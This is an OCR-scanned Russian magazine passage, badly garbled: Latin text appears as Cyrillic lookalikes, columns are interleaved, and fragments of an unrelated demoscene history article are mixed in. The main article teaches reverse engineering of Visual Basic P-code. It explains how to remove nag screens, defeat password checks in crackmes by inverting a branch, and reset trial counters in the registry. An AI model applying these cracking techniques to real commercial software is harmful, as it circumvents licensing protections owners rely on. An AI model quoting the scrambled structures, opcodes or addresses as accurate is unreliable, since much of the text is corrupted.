БЫ ЕЕ НЕ ВЗЛОМАЛИ. ЖУТЬ. А ВСЕ ИЗ-ЗА Р-КОДА, В КОТОРЫЙ ТАК УМЕЛО КОМ- 
ПИЛИРУЕТ ѴВ СВОИ ПРОРГАММЫ. В ОТЛИЧИЕ ОТ СТАНДАРТНОГО МАШИННОГО 
КОДА, ИСПОЛНЯЕМОГО НАПРЯМУЮ ПРОЦЕССОРОМ, Р-КОД - ЭТО НАБОР МНЕ- 
МОНИК ВИРТУАЛЬНОЙ МАШИНЫ, ИСПОЛНЯЕМЫЙ движком мзѵвѵмхх.оьь. 
ОЫУ - ТУТ НЕ БОЛЬШОЙ ПОМОЩНИК, А УЖ ЮА - ТЕМ БОЛЕЕ. ОДНАКО, ОБЛАДАЯ 
ТЕРПЕНИЕМ И ИНФОРМАЦИЕЙ, ИЗЛОЖЕННОЙ В ЭТОЙ СТАТЬЕ, ТЫ СМОЖЕШЬ 
РАЗОБРАТЬСЯ С ЭТОЙ НАПАСТЬЮ И БЕЗ СЛОЖНЫХ ПОДРУЧНЫХ СРЕДСТВ. 



НЕМНОГО О СТРУКТУРАХ 

Чтобы ломать... тьфу, я хотел сказать «ре- 
версить» программы, скомпиилированные в 
р-коде, этот р-код требуется сначала найти 
в дебрях ехе-файла. Для этого придется ра- 
зобраться хотя бы с частью структур ѴізиаІ 
Вазіс’а, в большом количестве запихнутых в 
программу. Начнем мы, пожалуй, с рассмот- 
рения оригинальной точки входа в программу. 
Чтобы на нее перейти, из НЕХ-редактора НІЕѴѴ 
жми по очереди: Епіег, Епіег, Е8, Е5. 

ризЬ 0004042Е8 ;’ѴВ5!’ 
саІІ ТИипВТМаіп ;М5ѴВѴМ60 - 

Смысл этой невероятно сложной строки 




Р-код в декомпиляторе 



заключается в вызове функции ТИипВТМаіп 
из М8ѴВѴМ60. В параметрах функции пере- 
дается указатель на структуру ѴВ Неабег. 
ТИипВТМаіп из нее получаетвсе необходимые 
данные и адреса структур, которые нужны 
для настройки и запуска ЕХЕ, асамое главное 
— адрес процедуры аЗиЬМаіп, запускаемой 
при старте ЕХЕ. Если поле с адресом этой 
процедуры равно нулю, то РгосСаІІЕпдіпе 
грузит первую форму, и управление пере- 
дается на функцию ЕогпгИпШаІіге, а если от- 
сутствует и она, то — Еогт.Цоаб. А уж если и 
этой функции нет, и в форме события не ис- 
пользуются, то запускается цикл ожидания 
событий (ѴѴіпбоѵѵРгос). Нам из этой структу- 
ры потребуются лишь аЗиЬМаіп и структура 
Рго]есІІпЩ>. Последняя имеет вид: 

Структура РгоіесІІпк) 

// Версия ѴВ-совместимости 

ІТетрІаІеѴегзіоп І_опд 

//Указатель на аОЬ|есГГаЫе 

аОЬіесІТаЫе І_опд 

ІІЧиІІІ І_опд 

// Начало кода (нам бесполезно) 

аЗіагЮГСобе І_опд 

// Конец кода (нам бесполезно) 

аЕпбОГСобе І_опд 

// Размер буфера для хранения различных данных 



ЮаІаВіЛІегЗіге І_опд 

// Пространство потока 

аТЬгеабЗрасе І_опд 

//Указатель на функцию обработки ошибок 

аѴВАЕхсерііопЬапбІег І_опд 

// Если равно нулю, то это р-код, иначе Ыаііѵе-код 

аЫаііѵеСобе І_опд 

иІпсІибеЮ 527Вуіе 

//Указатель натаблицуАРІ-функций 

аЕхіегпаІТаЫе І_опд 

//Число импортируемых АРІ-функций 

ІЕхіетаІСоипі І_опд 

Обозначенная таблица для нас как распутье. 
Продолжать далее имеет смысл, только если 
в аЫаІіѵеСобе стоит 0. Значит, функции на 
пикоде. Полезные нам данные мы получим из 
аОЬ]есГГаЫе - это указатель на структуру объ- 
ектов (форм модулей и так далее) среди прочих 
данных, в которых можно найти адреса проце- 
дур и событий. 

Структура ОЬІесІТаЫе 



ІГ\ІиІІ1 І_опд 

аЕхесРгоі І_опд 

аРго]есіІпІо2 І_опд 

ІСопзіІ І_опд 

ІЫиІІ2 І_опд 

аРгоіесЮЬіесІ І_опд 



ХАКЕР 06 /90/ 06 



083 






Ужасно, не правда ли? 



ииісЮЬіесіТаЫе І_опд 

РІад2 І_опд 

РІадЗ І_опд 

РІад4 І_опд 

ГСотріІеТуре Іпіедег 

//Число объектов 
ЮЬіесІзСоипІ; Іпіедег 

іСотріІесІОЬіесіз Іпіедег 

ЮЬіесІзІпУзе Іпіедег 



//Указатель на массив объектов (единственное, 
// что для нас в этой структуре важно, помимо 
//іОЬіесізСоипі) 



аОЬіесІзАггау 


І_опд 


ІЫиІІЗ 


І_опд 


ІІ\ІиІІ4 


І_опд 


ІІЧиІІб 


І_опд 


аМТЗРгоіесІЫате 


І_опд 


ІІ_сЮ1 


І_опд 


ІІ_сЮ2 


І_опд 


ІГѵІиІІб 


І_опд 


ІТетрІаІеѴегзіоп 


І_опд 


Теперь, когда мы определились с таблицей 
объектов, давай посмотрим поподробнее на 



их массив. ОЬІесІзАггау — это массив структур 
ТОЬ]есІ. Число элементов массива опреде- 
ляется полем ЮЬіесІзСоипР Рассмотрим-ка 
получше структуру ТОЬІесІ и производную от 
нее ТОЬіесІІпІо. 

Структура ТОЬіесІ 

//Указатель на структуру ОЬіесІІЫо 

аОЬіесіІпІо І_опд 

ІСопзіІ І_опд 

//Указатель на массив публичных переменных 

аРиЫісВуіез І_опд 

//Указатель на массив статических переменных 

аЗіаіісВуіез І_опд 

//Указатель на публичные переменные 

аМосЫеРиЫіс І_опд 

//Указатель на статические переменные 

аМосЫеЗіаііс І_опд 

//Указатель на имя объекта 

аЫТЗОЬіесІЫате І_опд 

// Число методов объекта 

ІМеібосІСоипі І_опд 

//Указатель на массив адресов функций 

аМеІбосІМатеТаЫе І_опд 

// Смещение на переменные из аМобиІеЗіаііс 

оЗіаіісѴагз І_опд 

//Тип объекта 

ЮЬ}ес1Туре І_опд 

ІЫиІІ2 І_опд 

Как видишь, эта структура уже поинтерес- 
нее. Поле аМТЗОЬІесІМате означает модуль. 
Если поле содержит адрес на (гтПедізІег, то 
это говорит нам, что функции, находящиеся в 
массиве из следующей структуры, отвечают за 
процесс проверки серийника. 




Заходи наѵѵѵѵѵѵ.сІоіРх.пеІ — почерпнешь 
много полезной информации по устройс- 
тву ѴВ. Декомпилятор ѴВ бери с ѵѵѵѵѵѵ. 
ѵЬ-сІесотріІег.огд 



Структура ТОЬІесІІпіо 

іСопзІІ Іпіедег 

//Индекс объекта 

ЮЬіесІІпсІех Іпіедег 

//Указатель на таблицу объектов (требуется для 

// разбора форм и объектов, лежащих на них) 

аОЬіесіТаЫе І_опд 

ІІЧиІИ І_опд 

аОЬіесЮезсгіріог І_опд 

ІСопз12 І_опд 

ІІ\ІиІІ2 І_опд 

// Указатель на ОЬіесіНеасІег 

аОЬіесіНеасІег І_опд 

//Указатель на ОЬіесЮаіа 

аОЬіесЮаіа І_опд 

//Следующие члены валидны только если 
// программа скомпилирована в р-код: 

//Число методов 

ІМеіІіосІСоипі Іпіедег 

ІІЧиІІЗ Іпіедег 

//Указатель на массив указателей на методы 

аМеібосІТаЫе І_опд 

//Число констант 

іСопзіапізСоипі Іпіедег 

// Максимально возможное число констант 

іМахСопзіапіз Іпіедег 

ІІ\ІиІІ4 І_опд 

ІРІадІ І_опд 

//Указатель на массив указателей на константы 

аСопзІапГГаЫе І_опд 

Если не брать во внимание ивенты объектов 
на форме, а только созданные пользовате- 
лем функции, то все их адреса можно найти в 
таблице, на которую указывает аМеІбосІТаЫе. 
Таблица для каждого модуля или формы, ко- 
нечно, своя — это логично. Чтобы получить 
доступ ко всем функциям, необходимо пере- 
брать все формы и модули, атакже классмоду- 
ли, юзерконтролы и т.д. Что же там по адресам 
из табл и цы методов? Т ам очередная структура, 
которыми любит нас потчевать микрософт. 

Структура РгосРзсІЫо 
РгосТаЫе І_опд 

1іеІсІ_4 Іпіедег 

РгатеЗіге Іпіедег 

РгосЗіге Іпіедег 

Я преднамеренно урезал эту структуру, так 
как нам из нее потребуется только РгосЗі^е 
и адрес на таблицу РгосТаЫе. Из таблицы 
РгосТаЫе нам потребуется только адрес на 
блок данных. Об этом блоке данных, думаю, 
надо поговорить поподробнее. Все опкоды пи- 
кода, которые так или иначе оперируют с дан- 
ными (будь то строки, АРІ функции и так далее) 
ссылаются на них не по абсолютному, а по от- 
носительному адресу. Относительный адрес 
идет от начала блока данных. Так что, не зная 



адреса на блок данных, мы, по сути, не сможем 
ничего декомпилировать. Отсюда рассмотрим 
следующую структуру, расположенную по ад- 
ресу РгосТаЫе: 

Структура РгосТаЫе 
ЗотеТетр Зігіпд*52 
РаІаСопзІ І_опд 

ЗотеТетр — это просто набор ненужных нам 
полей, которые я объединил, чтобы немного 
сэкономить места в статье. Они нам не пот- 
ребуются, так как для нас важен только адрес 
ОаІаСопзІ Теперь логичнозадать вопрос: ачто 
мы узнал и?Только размер пикодовой процеду- 
ры и адрес на блок данных? Однако адрес пи- 
кодовой процедуры напрямую нигде не пропи- 
сан, зато мы его можем получить вычитанием 
из адреса начала структуры РгосОзсІЫо поля 
зРгосОзсІЫо.РгосЗіге. Как видно, пикод идет 
прямо перед структурой РгосОзсІЫо. Что ж, 
теперь, когда мы знаем, откуда брать методы 
(про ивенты я умолчу в связи с ограничением 
объема статьи), можно приступать к исследо- 
ванию самого пикода. 

КАК ИССЛЕДОВАТЬ? 

Чтобы лучше во всем разбираться, нам потре- 
буется таблица опкодов. Она есть на диске. За- 
ранее предупреждаю, что таблица неполная, 
так как публичная, и имеет кое-какие ошибки, 
поэтому доверять ей на все 100% не советую, 
хотя это все-таки лучшее, что можно добыть в 
инете на данный момент. Таблица представле- 
на в виде: 

<опкод>1аЬ<размер>1аЬ<название> 

Опкод может состоять из одного или двух 
байт. До РВб опкода идут однобайтовые, далее 
— двухбайтовые. Если ты встретишь, к приме- 
ру РЕб, то следующий за ним байт относится к 
опкоду. <размер> в таблице — это число па- 
раметров. Теперь посмотрим на пример пико- 
дового блока: 

00 00 00 00-00 00 00 00-00 00 00 00-Р4 00 2В 6Е 
РЕ Р5 00 00-00 00 Р5 00-00 00 00 1 В-0С 00 04 70 
РР 34 6С 70-РР 1 В 0й 00-04 74 РР 34-6С 74 РР Р5 
00 00 00 00-59 78 РР 0А-0Е 00 1 8 00-ЗС 32 04 00 
74 РР70 РР-13 00 00 00 

Пикод в нашем блоке начинается с Е4. Посмот- 
рим по таблице, что же означает этот опкод. 
Согласно таблице, это — І_Ш2_Ву{е, который 
имеет один байт в параметрах. Запомни раз и 
навсегда, что І_іІ — это всегда ризб, а 12 — это 
двухбайтный іЫедег. Даю небольшую табличку 
всех возможных значений для упрощения ис- 
следования: 

Типы данных 

НИ Вуіе 
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Не забывай, что после- 


На компакт-диске ты най- 


дование чужих поило- 


дешь все необходимое для 


жений, — незаконно. 


исследования псевдокода 



ВооІ 


Вооіеап 


12 


Іп!едег 


14 


І_опд 


В4 


Зіпдіе 


В8 


ЭоиЫе 


Су 


Сиггепсу 


Ѵаг 


Ѵагіап! 


3!г 


3!гіпд 



Так как после Е4 идет 0, то логично предполо- 
жить, что эта команда ризИ 0. Продолжим да- 
лее. 2В — это РорТтрІ_сІАсІ2. Читать следует 
таким образом: Рор (гот з!аск (о Тетр ѵагіаЫе 
апб ЕоасІ Асісігезз (о з!аск. Итак, эта перемен- 
ная всего лишь резервирует содержимое вер- 
хней ячейки стека во временную переменную 
— нам это не потребуется, так как мы не ис- 
полняем код, а декомпилируем. Следующие 2 
байта — это та самая временная переменная 
РР6Е. Если число из отрицательного перевести 
в положительное, то получится 92. Мой деко- 
милятор в этом случае выведет ѵаг_92. Если 
бы число было положительным, то это была 
бы не локальная, а глобальная переменная. 
Думаю, теперь все ясно, так что приступим к 



в блоке данных? А имеем мы ѴА на следующую 
заглушку: 



все полученные нами данные, то выйдет что-то 
вроде: 



А1А0634000 

0ВС0 

7402 

РРЕО 

68542А4000 
В870 104000 
РРЭ0 



тоѵ еах,[004063А0] 
огеах.еах 
Іе .000402А77 
Ітреах 

ризИ 000402А54 
тоѵ еах, 000401 070 
саІІ еах 



В этой конструкции нам важен ризН 402А54. 
Виртуальный адрес 402А54 указывает на 
структуру вида: 

Структура СаІІАРІ 
з!гІ_ІЬгагуІ\Іате І_опд 

з!гРипс!іопІ\Іате і-опд 

Два виртуальных адреса указывают на имя ОН 
и имя функции, которая должна быть вызвана. 
Вот разработчики намудрили с виртуальной 
машиной, правда? 

Теперь-то мы знаем, почему ѴВ так тормозит. 
Чтобы вызвать любую АРІ-функцию, необхо- 



Іос_4043Р1 : ѵаг_90 = “Тез!” 

Іос_4043РВ: ѵаг_8С = “Тез!2” 

Іос_404407: 3!юІІЕхеси!е(0, ѵаг_8С, ѵаг_90, 0, 0, 0) 

родолжим исследовать пикод? Не закрывай 
таблицу опкодов — рано еще. 

Следующий и последний опкод 13 — 
Ехі!РгосР1гезиІ!. Как понятно из названия, он за- 




АРІ ог поііАРІ? 




ЕСЛИ НЕ БРАТЬ ВО ВНИМАНИЕ ИВЕНТЫ 
ОБЪЕКТОВ НА ФОРМЕ. А ТОЛЬКО СОЗДАННЫЕ 
ПОЛЬЗОВАТЕЛЕМ ФУНКЦИИ. ТО ВСЕ ИХ АДРЕСА 
МОЖНО НАЙТИ В ТАБЛИЦЕ. НА КОТОРУЮ 
УКАЗЫВАЕТ АМЕТНОРТАВІ.Е. 



следующей команде — Е5 - Еі!І4. Понимаем как 
ризН следующие 4 байта, то есть ризН 0. Далее 
опять идет ризН 0. Теперь — 1 В - Еі!3!г. Этот оп- 
код заносит строку в стек. Не зря я тебе рас- 
сказал про адрес на блок данных, именно от 
него и отсчитываются следующие два байта в 
параметрах, то есть: адрес строки = РгосТаЫе. 
ЭаІаСопз! + следующие за командой 2 байта. 
Строка представлена в юникоде и заканчива- 
ется двумя нулями. Допустим, что там строка 
«Тез!», следовательно, имеем ризН «Тез!». 04 
- ЕІ_сІН!Ѵаг, то есть ризТі — переменная. Пе- 
ременная вычисляется, как и раньше: ЕЕ70 = 
ѵаг_90. 34 - СЗ!г2Апзі. Считывает из стека два 
элемента и первому присваивает второй, то 
есть в стеке на данный момент находится пере- 
менная ѵаг_90 и строка «Тез!», следовательно, 
эту команду можно читать как ѵаг_90 = «Тез!». 
Далее следует 59 - РорТтр1_бАс13!г. Резерви- 
рует в переменной ѵаг_88 содержимое верх- 
ней ячейки стека, при этом занося заново это 
содержимое на вершину стека, чтобы оно не 
терялось. 0А — ІтрАсІСаІІЕРН4. Вот тут уже за- 
пахло чем-то вкусным . . . Мы видим СаІІ на фун- 
кцию, адрес которой отсчитывается от блока 
данных по традиции. Пока не забыл: эти два 
байта, прежде чем суммироваться с адресом 
блока данных, умножаются на 4 — правило, 
которое нужно учесть. Итак, что же мы имеем 



димо пройти немыслимое количество структур 
и заглушек, что тратит золотые такты процес- 
сора и жутко снижает скорость. Как видишь, 
никакой таблицы импорта нет. Мы имеем дело 
с именем ЭІІ и функциями, которые вызыва- 
ются динамически функцией ОІІЕипс!іопСаІІ 
(экспортируется из всеми нами замусоленной 
тзѵЬѵтбО.сІІІ). 

В8701 04000 тоѵ еах, 000401 070 ~?3 

РРЭ0 саІІ еах 

Эти строки получают адрес на этот переход- 
ник: 

Ітр ЭІІРипс!іопСаІІ 

И вызывают его через саІІ еах, который нахо- 
дится в функции ОІІРипс!іопСаІІ: 

ШЬ = Ое!Моби1еНапб1е(з!гиЬгагуЫате) 

РРгос = Ое!РгосАсІсІгезз(ШЬ, з!гРипс!іопЫате) 
СаІІ ИРгос 

В нашем же случае з!гЕіЬгагуЫате - это изег32. 
сІІІ, а з!гРипс!іопІ\Іате — ЗНеІІЕхесіЛе. Теперь 
— то ясно, зачем в пикоде было столько ризН’ей 
и резервирований. Это всего лишь подготовка 
стека для вызова ЗИеІІЕхеси!. Если свернуть 



вершает процедуру. Это значит, что после него 
идет уже известная нам структура РгосЭзсІпІо. 
Вот мы и разобрались, как декомпилировать 
пикод в уме. Теперь пора поговорить о реаль- 
ных задачах по исследованию — анализиро- 
вать будем в моем декомпиляторе. 

СРУБАЕМ ЫАС-СКРИНЫ 

В любой программе есть две проблемы: триал и 
ІМАО-скрины. Если триал обычно можно обой- 
ти , л ишь найдя ключ в реестре, который отвеча- 
ет за счетчик дней, и написав простенький ин- 
лайн-патч, который будет перед запуском ЕХЕ 
обнулять этот ключ, то с нагами такой номер не 
пройдет. Они надоедают либо до покупки про- 
ги, либо до отрубания этих злостных трюков. 
Думаю, лучшим примером ЫАО-скрина в виде 
мессаги будет простенький крэкми на пикоде. 
Не уверен, что ты найдешь его в интернете, по- 
этому бери с диска (я его назвал “АС_Сгаскте_ 
ОІ.ехе”). Откроем-ка мы его в декомпиляторе, 
чтобы посмотреть, с чем мы имеем дело. Видим 
две процедуры: одна закрывает приложение 
по кнопке, вторая - та, что в РогпгіД-оасІ: 

Іос_401А48: 1_і!Ѵаг_МІ53Іпд ѵаг_104 

Іос_401А4В: І_і!Ѵаг_Міз5Іпд ѵаг_Е4 

Іос_401А4Е: І_і!Ѵаг_МІ55Іпд ѵаг_С4 

Іос_401А51: 1_І!І4 0 
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ТРИАЛ ОБЫЧНО МОЖНО ОБОЙТИ. 
НАЙДЯ КЛЮЧ В РЕЕСТРЕ. 
ОТВЕЧАЮЩИЙ ЗА СЧЕТЧИК ДНЕЙ. И 
НАПИСАВ ПРОСТЕНЬКИЙ ИНЛАЙН- 
ПАТЧ. КОТОРЫЙ БУДЕТ ПЕРЕД 
ЗАПУСКОМ ЕХЕ ЕГО ОБНУЛЯТЬ. 



Іос_401А56: ЫіѴагЗіг ѵаг_94, “ЫАО” 

Іос_401А5В: РЗіѴагСоруОЬі ѵаг_А4 

Іос_401А5Е: РЫВА/аг ѵаг_А4 
Іос_401 А61 : ІтрАсЮаІІРРВ4 М5дВох(, , , , ) 
Іос_401А66: РРгееѴаг ѵаг_А4 = ѵаг_С4 = 



каем — нага как не бывало, осталось убрать 
форму нага, но это будет домашним заданием. 
Надеюсь, ты спрашишься без проблем. 

ЛОМАЕМ ЗАПРОС ПАРОЛЯ 



Іос_401 ОСО: ‘ Веіегепсесі {гот: 401 ОА1 
Іос_40ЮСО: ЕхИРгосНгезиИ 
Іос_40ЮСЕ: ІтрАбШРРР4 

Просмотрев внимательно код, видим сравне- 
ние в самом начале: 

Іос_401 067: ЫіЗіг “ЕхОес_Вохх” 

Іос_401 йбА: РЗіЗігСору ѵаг_88 

Іос_40Ю60: ІЫВ{ѵаг_88 

Іос_40Ю70:ІІ_сІРКѵаг_8С 

1ос_40Ю73:Ед31г 

Іос_401 075: ВгапсбР Іос_401 0А4 

Понимать этот код следует примерно так: 



ѵаг_Е4 = 

Іос_401 А71 : ЕхИРгосНгезиІі 

Видим вызов МздВох по адресу 401 А61. Как 
ты понимаешь, нам его нужно убрать. Тут есть 
несколько путей. Так как в данном случае вся 
функция — это ЫАС, то можно просто сделать 
выход в самом начале функции, то есть по ад- 
ресу Іос_401А48 вбить опкод ЕхіІРгосНгезиН:. 
Красиво, оригинально, а главное — работает. 
Посмотрим теперь крэкми посложнее — «АС_ 
Сгаскте_0 1 _А.ехе» : 

Іос_401 0Е8: ЫіѴаМѴІіззіпд ѵаг_1 04 
Іос_401 йЕВ: ЫіѴаМѴІіззіпд ѵаг_Е4 
Іос_401 ОЕЕ: ЫіѴаМѴІіззіпд ѵаг_С4 
Іос_40ЮР1 : ІЛІ40 

Іос_40ЮР6: ІЛѴагЗіг ѵаг_94, “АпоІЬег ІЧАО” 
Іос_401 йРВ: РЗіѴагСоруОЬі ѵаг_А4 
Іос_40ЮРЕ: РІ_сІН{Ѵагѵаг_А4 
Іос_401 Е01 : ІтрАбСаІІРРВ4 МздВох(, , , , ) 

Іос_401 Е06: РРгееѴаг ѵаг_А4 = ѵаг_С4 = 
ѵаг_Р4 = 

Іос_401 Е 1 1 : РШРг агд_8 
Іос_401 Р14: Ме.Нібе 
Іос_401Р19: ЫіѴаМѴІіззіпд ѵаг_В4 
Іос_401 Р1С: РорАсИсІѴаг 
Іос_401 ЕЮ: ЫіѴаМѴІіззіпд ѵаг_94 
Іос_401 Р20: РорАбЫѴаг 
Іос_401 Р21 : ІтрАсІШВІ ипк_401 9Р4 
Іос_401 Р24: І\ІеѵѵІ{І\ІиІІРг 

Іос_401 Р27: Ме.ЗЬоѵѵ{гот_5Іаск_1 Ігот_зІаск_2 
Іос_401Р2С: ЕхііРгосНгезиІІ 
Іос_401 Р2й: ІІ_сІРг 

Видим, что по адресу 401 Е01 выводится один 
нагс помощью МздВох, затем в 401 Е1 4скрыва- 
етсяформа, и в401 Е27 происходитзагрузкаос- 
новного окна. Здесь я рассмотрю сначала, как 
можно обойти мессагу, а уж потом поговорим 
про форму. Какже обойти этот вызов МздВох? 
А как бы мы его обошли в программировании? 
Наверное, будет логично по адресу 401 ОЕ8 
прописать СоТо на адрес 401 Е1 1 , что мы и сде- 
лаем. В качестве СоТо используется ВгапсИР, 
а адрес рассчитывается относительно адреса 
начала данной функции. То есть начальный ад- 
рес — 40ЮЕ8, анам нужно перейти на 401 Е1 1, 
следовательно, в начало функции 401 Е1 1 Н- 
40ЮЕ81т=291т надо приписать 1Е2900. Запус- 



Хорошим примером на эту тему будет крэкми 
«АС_Сгаскте_02_А.ехе». В нем нужно ввести 
верный серийник. Если серийник неверный, 
то выводится «Іиххог». Давай посмотрим его в 
декомпиляторе: 



Іос_401 04С: РШВІѴагѵаг_94 
Іос_40Ю4Р: РЫРгТЫз 
Іос_401 050: ѴСаІІАсІ Сгаскте.РгатеІ 
Іос_40Ю53: РЗіАбРипс ѵаг_90 
Іос_40Ю56:РЫРгѵаг_90 
Іос_401 059: Ігот_зіаск_1 = ТехІВох.ТехІ 
Іос_40Ю5Е: РІ-СІХегоАсІ ѵаг_94 
Іос_401 йбі : РЗіЗіг ѵаг_8С 
Іос_401 й64: РРгееІ Аб ѵаг_90 
Іос_401 067: ЫіЗіг “ЕхОес_Вохх” 
Іос_40Ю6А: РЗі51гСоруѵаг_88 
Іос_40Ю6О: ІІ_бВІѵаг_88 
Іос_40Ю70:ІІ_бВІѵаг_8С 
Іос_40Ю73: ЕцЗІг 
Іос_401 075: ВгапсЬР Іос_401 йА4 
Іос_401 078: ЫіѴаМѴІіззіпд ѵаг_1 1 4 
Іос_40Ю7В: ЫіѴаМѴІіззіпд ѵаг_Р4 
Іос_40Ю7Е: І_ііѴаг_Міззіпд ѵаг_й4 
Іос_40Ю81: ІЛІ40 
Іос_40Ю86: ІЛѴагЗіг ѵаг_А4, 

“уезз” 

Іос_40Ю8В: РЗіѴагСоруОЬі 
ѵаг_В4 

Іос_40Ю8Е: РІ_бВІѴаг 
ѵаг_В4 

Іос_401 й91 : ІтрАбСаІІРРВ4 
МздВох(, , , , ) 

Іос_40Ю96: РРгееѴаг 
ѵаг_В4 = ѵаг_й4 = 
ѵаг_Р4 = 

Іос_40ЮА1: Вгапсб 
Іос_40ЮСО 
Іос_40ЮА4: 

‘ Веіегепсеб {гот: 401 075 
Іос_401 ОА4\ ЫіѴаМѴІіззіпд ѵаг_1 1 4 
Іос_401 йА7: ЫіѴаМѴІіззіпд ѵаг_Р4 
Іос_401 йАА: ЫіѴаМѴІіззіпд ѵаг_й4 
Іос_40ЮАО: ЫІІ40 
Іос_40ЮВ2: ІЛѴагЗіг ѵаг_А4, “Іиххог’ 
Іос_401 ОВ7: РЗіѴагСоруОЬі ѵаг_В4 
Іос_40ЮВА: РІ_бВІѴагѵаг_В4 
Іос_401 ОВй: ІтрАбСаІІРРВ4 МздВо) 
Іос_40ЮС2: РРгееѴаг ѵаг_В4 = 
ѵаг_й4 = ѵаг_Р4 = 



ѵаг_88=”ЕхОес_Вохх” 
іі (ѵаг_88=ѵаг_8С) ІЬеп 

Затем видим мессагу, которая говорит о том, 
что пасс верный. Пасс-то мы узнали, толь- 
ко крэкнуть бы его, чтобы любой неверный 
пароль подходил. ВгапсИР по адресу 401 075 
джампается на вывод инфы о неверном паро- 
ле, следовательно, он понимается как фе, то 
есть, если ЕцЗіг возвращает нам разные стро- 
ки, то джампаемся. Вывод — инвертировать 
инструкцию. Следует понимать, что в ѴВ всего 
три типа переходов, два из которых — услов- 
ные (1С и Ю). То есть для инвертирования нам 
надо 1 С заменить на 1 0, или наоборот. Меняем 
- мессаги больше нет. дс 
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Вы катитв знать яритарии выбора оянавоО 
олвц&т&щиР? Я С уйвтъетіт* 
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зфф&ктмаяости Эфф&ктианостъ оружия 
опредапттсп количеством трупов нб квад- 
ратный метр площас Ій 1 

- г*м&рлр-улнйр кр«с Мартын, 
-командир Первого морского 
подразделение лагери Пендлтон. 
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Сцена / 01 



Я решил написать эту статью по двум причинам. 
Прежде всего потому, что все материалы, написанные 
о Сцене, рассказывали об этом явлении очень поверхностно. 
Второй причиной стала недавно опубликованная в ][ статья 
«Хакерский лайфстайл 90-х», которая натолкнула меня 
на мысль выяснить, насколько близки были по духу хак-сцена 
и демосцена. В любом случае, думаю, тебе будет интересно 
узнать, чем жили и занимались наши сценеры на протяжении 
последних 15-ти лет. Тем более, что информацию ты 
получишь, что называется, из первых рук. 



Полевой андеграунд 




те годы, когда андеграунд потихоньку начинал просачиваться в Россию с Запада, 

Сценабылаединой. Люди бралисьзавсе: демомейкинг, варез, крэкинг, аски-арт, останавливаясь натом, что получалось лучше всего. В 
это время первыми русскими электронными журналами был и«Хакер» (непутатьс][акером)иего злейший противник е-гіпе «НАРМ».Они 
публиковал и материалы о вирусомейкинге, техниках рисования многоэкранных АЫЗІ и другие специализированные материалы. Это была 
Сцена во всем ее «многообразии». Первыми сценерскими компьютерами были Спектрум и Амига. Многие писишные сценеры начинали 
именно с этих платформ. Все, что попадало в Россию из софта, было уже взломано западными крэкерами, так что волей-неволей русские 
компьютерщики узнали о таком явлении, как демосцена. Игрушки сопровождались интрами крэктимов, названия которых внушали 
трепет. Основной поток сценерского стафа шел из Польши, оттудаже к нам явился так называемый зсепе зрігіі — сценерский дух. 

До того момента, как сети стали доступными, релизы распространялись обычными людьми. В Питере местом, где можно было раздобыть 
свежачок, был культовый рынок «Автово» (ныне ЮНОНА). В других крупных городах были свои тусовочные точки. Варез приобретался 
там и распространялся дальше через проводников поездов дальнего следования. Торговые точки в «Автово» содержали рядовые сце- 
неры, геймдевелоперы (такие как ЗоЙІапсІ Зойѵѵаге, ѴіКз) и просто хорошие люди, которые торговали софтом по символическим ценам, 
едва превышающим стоимость дискеты. Из последних можно отметить фирму «Логрос», имевшую точки на Юноне и магазинчик на Пет- 
роградской стороне, в котором постоянно собирался творческий спектрумовский народ. Все хитовые релизы распространялись через 
них: сценеры приносили Л огросу свои сокровища, а они делились с остальными. На самом раннем этапе возникновения рынка« Автово» 
народ собирался прямо на поле. Приходили, выкладывали натряпочках всякие компьютерные запчасти, дрели, телевизоры и торговали, 
обмениваясь новостями, обсуждая, «как жить дальше». Милиция, естественно, их гоняла: в советское время перепродажа вещей счи- 
талась спекуляцией и наказывалась. Но искоренить это было невозможно. В 1993-м году появились спектрумовские модемы — Ѵісотт. 
Ужасно примитивные, но для прогрессивных компьютерщиков это была революция. Самые свежие сценерские и игровые новинки мож- 
но было получить, не выходя из дома! Первой спектрумовской ВВЗ была ЕІбогабо, созданная для поддержки этого самого Ѵісотт . Потом 
уже стали появляться другие борды. Появление модемов сделало доступной сеть РЮО, в которой появились спектрумовские шлюзы. 

Наскальные надписи 

В это время НВд стала призывать в своем е- 2 Іпе«НАВМ» не браться за все сразу и не смешивать разные Сцены в одну. Появились первые 
определения: арт-сцена, демосцена, хак-сцена и так далее. Хотя отдельные сообщества обосабливались и без Ітгд'шного совета: аски- 
художики перестали рисовать .піо для пиратов и, сбившись в азсіі-группы, выпускали арт-паки. Популяризация Интернета сделала не- 
нужными борды, и народ, представляющий разные сценовые направления и ранее совместно тусовавшийся на элитных ВВЗ, разбежал- 
ся поспециализированным веб-сайтам. Мастерахайрезаи пикселя разделились надвалагеря: первые, рисовавшие влучшихтрадициях 
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.ЛГИІ 50 ШГМІ,? 



Дискмаг «Хакер» 



Многие демки делались в подарок — например, на день рождения 
другу-сценеру. Были и специальные «обсирающие» демки, а так- 
же информационные или рекламные, по типу популярных сейчас 
іпѵііаііоп — программы, прокручивающей определенный эффект и 
приглашающей принять участие в демопати». 



Сценовые тусы 



Г ритсы в интре 

демосцены, остались преданными ей, а художников, тянущихся ко 
всяким экспериментам и новым техникам рисования, «захватила» 
арт-сцена. Через несколько лет, побледневшая, затерявшаяся в 
океане мирового креативного сообщества. 

Что касается музыкальной тусовки, один из олдскульных сцено- 
вых музыкантов І_АѴ, бывший в свое время членом НРд, а позже 
Запсіз, рассказал следующее: «Музыканты всегда были немного 
отделены от хакерской тусовки и состояли в ней только для того, 
чтобы просто где-нибудь«состоять», поэтому в дела и разборки 
хакеров они не лезли. Наиболее успешные музыканты обособи- 
лись и создали отдельные творческие группы, самой известной из 
которых в середине 90-х сталаТИе ЗапсІЗ. Ее членами были лучшие 
из лучших». 

По-настоящему бурное развитие получила демосцена. В то время 
каждый считал себя обязанным написать свою, пусть даже самую 
примитивную демку, чтобы выразить друзьям свой респект или пе- 
редать {иск-выражение. Какие кипели страсти в скролингах интр 
тех лет! Сценеры вели переписку посредством бегущих строк, спо- 
рили, ругались — этобылауникальнаясистемаобщения. Напишет, 
например, один мини-демку со строчкой типа:«Привет, я 2егоСоІсІ 
из города Махачкала, сделал вот такой суперэффект, смотрите! 
Ѳгееііпдз: АсісІ Вигп, ІЧікоп. Риск Іо РІид из города Берюки! Всем 
ВУЕ! ! » . А через несколько недель в другом конце страны выходит 
другая демка с текстом: «Ні, я РІид из Берюков, а это моя новая 
мегакрутая демка. Огееііпдг Іо: ОосІ, Зех, Боѵе, РІІСКТО 2егоСоІсІ 
